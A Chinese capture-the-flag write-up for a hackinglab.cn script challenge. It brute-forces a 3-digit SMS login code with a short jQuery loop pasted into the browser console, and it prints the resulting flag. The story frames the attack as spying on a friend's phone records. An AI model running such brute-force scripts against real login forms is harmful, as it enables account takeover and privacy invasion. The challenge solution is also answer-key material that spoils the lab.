hackinglab.cn脚本关之十

题目：

Tips:你是一名黑客，你怀疑你的“（男/女）闺蜜”的出轨了，你要登陆TA手机的网上营业厅查看详单，一探究竟！ 闺蜜手机号码:13388886666

writeup：

1. 打开题目链接是一个输入验证码提交的题目，点击获取验证码

   手机验证码是：验证码发到手机上了，你看不到..是3位纯数字，开头不为0

   
   看来是要暴力破解了。。。
2. 破解之前要先知道表单的字段，查看源代码

   
       
           
           
       
       
           请使用手机短信验证码登陆
           
   Tips:你是一名黑客，你怀疑你的“（男/女）闺蜜”的出轨了，你要登陆TA手机的网上营业厅查看详单，一探究竟！
           
   闺蜜手机号码:13388886666
       	
   
               Phone: 
   
               Vcode: 
   
               点击获取手机验证码
               
   
           
       
   
   

   
   
   
3. 可以用工具或脚本破解，这里由于数位不多我直接用js写了个脚本（网页中包含了jquery库，可以利用）

   var getKey=function(phone){//phone指登陆号码
   	var i=100;
   	while(i<1000){
   		$.post('login.php',{username:phone,vcode:''+i},function(data){
   			if(data.indexOf('error')==-1) alert(data);
   		});
   		i++;
   	}
   }

   
   
4. 打开web控制台粘贴上面的代码回车，然后执行函数

   你伤心的发现他/她正在跟你的前男/女友勾搭.....于是下决心看看前任除了跟你的（男/女）闺蜜勾搭，是不是还跟别的勾搭..
   前任的手机号码是:13399999999

   
   会弹出这个结果。那么换上新号码在执行函数

   key is LKK8*(!@@sd

   
   弹出结果，获得key。

注意：用的ajax，破解时发的请求多可能会卡但只有一小会儿。